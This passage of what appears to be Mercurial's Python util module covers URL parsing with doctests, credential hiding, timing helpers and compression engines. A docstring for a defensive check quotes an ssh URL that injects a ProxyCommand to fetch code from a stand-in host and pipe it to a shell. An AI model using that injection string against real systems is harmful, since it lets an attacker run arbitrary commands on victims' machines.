    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
            if self.port:
                s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))

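# Usage sketch (editor's illustration, not part of the original module;
# the second url is a made-up attack string):
#
#     from mercurial import util
#     util.checksafessh(b'ssh://host/repo')                  # passes silently
#     util.checksafessh(b'ssh://-oProxyCommand=evil/path')   # raises error.Abort
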
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

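# Usage sketch (editor's illustration, not part of the original module;
# the credentials are made up):
#
#     from mercurial import util
#     util.hidepassword(b'http://joe:secret@example.com/repo')
#     # -> 'http://joe:***@example.com/repo'
#     util.removeauth(b'http://joe:secret@example.com/repo')
#     # -> 'http://example.com/repo'
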
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else '<unknown>'

    __str__ = encoding.strmethod(__bytes__)

@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1

timedcm._nested = 0

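# Usage sketch (editor's illustration, not part of the original module;
# ``expensive()`` is a hypothetical workload):
#
#     from mercurial import util
#     with util.timedcm(b'expensive call') as stats:
#         expensive()
#     print(bytes(stats))   # e.g. '12.3 ms' once the context has exited
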
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write('%s%s: %s\n' % (
            ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
            time_stats))
        return result
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

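# Usage sketch (editor's illustration, not part of the original module;
# sources and hook functions are made up):
#
#     from mercurial import util
#     h = util.hooks()
#     h.add(b'zzz-source', lambda x: x * 2)
#     h.add(b'aaa-source', lambda x: x + 1)
#     h(3)   # -> [4, 6]: hooks run sorted by source name, not add order
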
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

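# Usage sketch (editor's illustration, not part of the original module):
#
#     from mercurial import util
#     def helper():
#         util.debugstacktrace(b'reached helper')
#     helper()   # writes 'reached helper at:' plus caller frames to stderr
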
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

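# Usage sketch (editor's illustration, not part of the original module;
# the paths are made up). Note that the C implementation from ``parsers``
# replaces the Python class above when available, with the same interface.
#
#     from mercurial import util
#     d = util.dirs([b'a/b/c', b'a/d'])
#     b'a' in d      # -> True
#     b'a/b' in d    # -> True
#     b'a/b/c' in d  # -> False: files themselves are not directories
#     list(util.finddirs(b'a/b/c'))  # -> ['a/b', 'a']
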
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # An engine may not declare an external facing (bundle spec) name.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

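# Illustrative lookups (not part of the original module): engines registered
# further down are resolved through this global manager.
#
#     engine = compengines.forbundlename('gzip')   # by bundle spec name
#     engine = compengines.forbundletype('GZ')     # by internal identifier
#     'zstd' in compengines                        # membership by engine name
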
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

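# Minimal sketch of a custom engine (hypothetical, for illustration only): a
# pass-through engine implementing just enough of the interface above to be
# registered. A real engine would typically also implement ``bundletype``,
# ``wireprotosupport``, ``revlogheader`` and ``revlogcompressor`` as needed.
#
#     class _identityengine(compressionengine):
#         def name(self):
#             return 'identity-example'
#
#         def compressstream(self, it, opts=None):
#             return it
#
#         def decompressorreader(self, fh):
#             return fh
#
#     compengines.register(_identityengine())
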
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    # The first pending chunk alone satisfies the request:
                    # slice it and remember the offset for the next read.
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                # Consume the (rest of the) first pending chunk entirely.
                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        # Probe for end of stream on a copy so the real decompressor's state
        # is left untouched: if the probe byte comes back in unused_data, the
        # underlying zlib stream has ended.
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

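# Illustrative round trip (not part of the original module), using the
# standard library to fabricate a compressed stream:
#
#     import io, zlib
#     raw = b'x' * 4096
#     reader = _GzipCompressedStreamReader(io.BytesIO(zlib.compress(raw)))
#     assert reader.read(4096) == raw
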
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

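# Illustrative usage (not part of the original module): streaming compression
# through the engine just registered.
#
#     engine = compengines['zlib']
#     chunks = [b'some ', b'data ', b'to compress']
#     compressed = b''.join(engine.compressstream(iter(chunks)))
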
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _ZstdCompressedStreamReader(fh, self._module)

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
